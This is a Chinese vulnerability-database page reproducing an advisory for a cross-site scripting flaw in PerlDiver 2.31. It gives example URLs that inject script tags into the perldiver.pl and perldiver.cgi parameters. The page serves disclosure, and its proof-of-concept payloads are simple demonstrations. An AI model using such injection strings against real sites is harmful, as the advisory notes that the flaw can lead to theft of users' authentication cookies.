PerlDiver 2.31 – ‘Perldiver.cgi’ Cross-Site Scripting

32次阅读
没有评论

PerlDiver 2.31 – ‘Perldiver.cgi’ Cross-Site Scripting

漏洞ID 1055343 漏洞类型
发布时间 2005-08-21 更新时间 2005-08-21
PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site ScriptingCVE编号 N/A
PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site ScriptingCNNVD-ID N/A
漏洞平台 CGI CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26290
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14894/info

PerlDiver is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

Version 1.x
------
http://www.example.com/[path]/perldiver.pl?testhere<SCRIPT>alert(document.domain);</SCRIPT>


version 2.x
------
http://www.example.com/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script>

相关推荐: Dick Lin ZetaMail 2.1 – Login Denial of Service

Dick Lin ZetaMail 2.1 – Login Denial of Service 漏洞ID 1053428 漏洞类型 发布时间 1999-11-18 更新时间 1999-11-18 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Wind…

正文完
 0